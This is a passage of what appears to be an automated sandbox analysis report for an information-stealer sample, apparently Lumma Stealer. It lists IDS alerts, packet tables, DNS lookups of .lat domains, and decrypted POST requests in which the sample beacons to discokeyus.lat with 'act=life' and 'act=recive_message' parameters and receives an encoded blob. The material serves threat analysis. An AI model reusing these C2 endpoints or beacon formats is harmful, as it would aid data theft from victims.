                                                                                                                                              2024-12-20T16:39:49.461411+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449743104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:53.857296+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449744104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:53.857296+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.21.99443TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 20, 2024 16:39:18.339473963 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:18.339508057 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:18.339584112 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:18.343544960 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:18.343559027 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:19.893619061 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:19.893838882 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:19.896661997 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:19.896676064 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:19.896939993 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:19.950104952 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:19.950135946 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:19.950252056 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.885148048 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.885258913 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.885377884 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.907138109 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.907167912 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.907181025 CET49731443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.907186031 CET44349731104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.977003098 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.977057934 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:34.977128029 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.978379965 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:34.978401899 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.192914963 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.192991972 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.218904018 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.218952894 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.219310999 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.220854998 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.220880985 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.220946074 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965282917 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965348005 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965399981 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.965447903 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965909958 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965949059 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.965959072 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.965974092 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.966023922 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.966078997 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.966088057 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.966124058 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.973709106 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.984934092 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:36.984986067 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:36.985019922 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.028975010 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.029017925 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.076003075 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.084939003 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.138356924 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.157351971 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.160984039 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161025047 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161036015 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.161068916 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161115885 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.161123037 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161147118 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161195040 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.161331892 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.161351919 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.161365986 CET49734443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.161371946 CET44349734104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.350574970 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.350671053 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:37.350802898 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.351191044 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:37.351207018 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:38.571461916 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:38.571587086 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:38.572815895 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:38.572845936 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:38.573110104 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:38.582232952 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:38.582391977 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:38.582452059 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:38.582556009 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:38.582571983 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:39.547914982 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:39.548032999 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:39.548161030 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:39.548243046 CET49737443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:39.548270941 CET44349737104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:39.629245043 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:39.629287958 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:39.629404068 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:39.629863024 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:39.629879951 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.841640949 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.841706991 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.862905025 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.862941027 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.863221884 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.866144896 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.866307974 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.866331100 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667073011 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667182922 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667331934 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:41.667491913 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:41.667512894 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:42.037110090 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037158966 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:42.037262917 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037677050 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037687063 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.252512932 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.252650023 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.281445026 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.281469107 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.281819105 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.325728893 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.325881004 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.325917959 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.326000929 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.326013088 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640116930 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640223026 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640310049 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:44.640510082 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:44.640527010 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:45.367722034 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.367772102 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:45.367840052 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.368154049 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.368166924 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.580661058 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.580756903 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.582199097 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.582210064 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.582500935 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.586198092 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.586299896 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.586313963 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.652709007 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.652813911 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.653058052 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:47.653254032 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:47.653271914 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:48.195290089 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195403099 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:48.195564032 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195919991 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195952892 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.456291914 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.456371069 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.457715988 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.457736969 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.458028078 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.459387064 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460190058 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460232973 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460494041 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460526943 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460663080 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460690022 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460823059 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460865974 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461019993 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461061001 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461225986 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461266994 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461280107 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461297989 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461455107 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461489916 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461519003 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461599112 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461632013 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503334045 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503573895 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503624916 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503650904 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503673077 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503724098 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503745079 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.887825966 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.887954950 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.888039112 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.888247013 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.888287067 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.898236036 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898289919 CET44349744104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.898371935 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898657084 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898672104 CET44349744104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:53.857295990 CET49744443192.168.2.4104.21.21.99

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 20, 2024 16:39:17.895965099 CET5899953192.168.2.41.1.1.1
                                                                                                                                              Dec 20, 2024 16:39:18.033123016 CET53589991.1.1.1192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:18.045613050 CET4921753192.168.2.41.1.1.1
                                                                                                                                              Dec 20, 2024 16:39:18.182950020 CET53492171.1.1.1192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:18.189507961 CET5514653192.168.2.41.1.1.1
                                                                                                                                              Dec 20, 2024 16:39:18.327400923 CET53551461.1.1.1192.168.2.4

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Dec 20, 2024 16:39:17.895965099 CET192.168.2.41.1.1.10xf542Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                              Dec 20, 2024 16:39:18.045613050 CET192.168.2.41.1.1.10x31acStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                              Dec 20, 2024 16:39:18.189507961 CET192.168.2.41.1.1.10x8151Standard query (0)discokeyus.latA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Dec 20, 2024 16:39:18.033123016 CET1.1.1.1192.168.2.40xf542Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Dec 20, 2024 16:39:18.182950020 CET1.1.1.1192.168.2.40x31acName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Dec 20, 2024 16:39:18.327400923 CET1.1.1.1192.168.2.40x8151No error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                                                              Dec 20, 2024 16:39:18.327400923 CET1.1.1.1192.168.2.40x8151No error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • discokeyus.lat

                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449731104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:19 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                              Data Ascii: act=life
                                                                                                                                              2024-12-20 15:39:34 UTC1123INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:34 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=o2q08gqqg3dr5iekj000d7sr1t; expires=Tue, 15 Apr 2025 09:26:13 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCHCwvsSE%2BnGOwsNO5HFDrOSUk%2FDOY8ekioz3qWshEhQUep78jpRIAbfYWkm2MNjje9KKeismeT3WKzrgZsMzR4O817di1T7LceZ75bzqGuFmHKImtsWSrmyYY3L6xieYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b97b0ce2f02d-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4204&recv_bytes=905&delivery_rate=254843&cwnd=77&unsent_bytes=0&cid=e15fcd554e019dce&ts=15247&x=0"
                                                                                                                                              2024-12-20 15:39:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                              Data Ascii: 2ok
                                                                                                                                              2024-12-20 15:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.449734104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:36 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 47
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:36 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                              2024-12-20 15:39:36 UTC1127INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:36 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=6qr23jlhkp0oiqflcsq0am5eb8; expires=Tue, 15 Apr 2025 09:26:15 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rL67hjfWyi4%2Bsmj7R1uuKjr3j9DcTY0mI4zobnnqG3%2B010xtAGVNJ%2FdMdpPOZN2oGkJ1p9u4RjnKNn%2FOmbjeEzCqozmSBhQGwwVcxDap6WhZHp9dsdawsbAFsPZi7q3xEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9e0fbb77285-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1781&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=1561497&cwnd=249&unsent_bytes=0&cid=cde7e75042f51d0e&ts=779&x=0"
                                                                                                                                              2024-12-20 15:39:36 UTC242INData Raw: 31 63 61 63 0d 0a 69 6e 69 39 43 62 5a 65 33 58 42 44 30 78 61 63 78 38 79 51 38 36 38 63 51 38 38 6f 2f 62 47 70 63 75 4f 37 45 6b 38 71 50 4a 37 78 57 73 73 72 6a 47 72 78 55 6a 43 32 4e 4b 61 7a 76 75 57 57 67 7a 34 69 71 77 72 48 31 38 67 65 6b 4e 34 2b 62 56 78 52 76 4c 41 65 33 47 58 46 4f 2f 46 53 4a 71 73 30 70 70 79 33 73 70 62 42 50 6e 6e 74 54 5a 66 54 79 42 36 42 32 6e 6b 67 57 6c 44 39 34 68 54 61 59 64 4d 39 75 52 45 76 76 6e 50 35 6f 71 33 36 6e 63 5a 78 4b 36 49 4b 30 5a 50 4d 43 4d 47 42 4d 41 4a 50 53 50 2f 48 47 63 35 69 6c 43 50 78 43 32 47 32 65 4c 37 39 37 76 47 57 7a 58 41 6c 71 30 4f 56 32 63 45 57 67 4e 39 34 50 30 4e 61 39 75 49 61 32 57 44 5a 4e 4b 30 63 4a 62 6c 34 2f 36 69 74 73 74 2b 4e
                                                                                                                                              Data Ascii: 1cacini9CbZe3XBD0xacx8yQ868cQ88o/bGpcuO7Ek8qPJ7xWssrjGrxUjC2NKazvuWWgz4iqwrH18gekN4+bVxRvLAe3GXFO/FSJqs0ppy3spbBPnntTZfTyB6B2nkgWlD94hTaYdM9uREvvnP5oq36ncZxK6IK0ZPMCMGBMAJPSP/HGc5ilCPxC2G2eL797vGWzXAlq0OV2cEWgN94P0Na9uIa2WDZNK0cJbl4/6itst+N
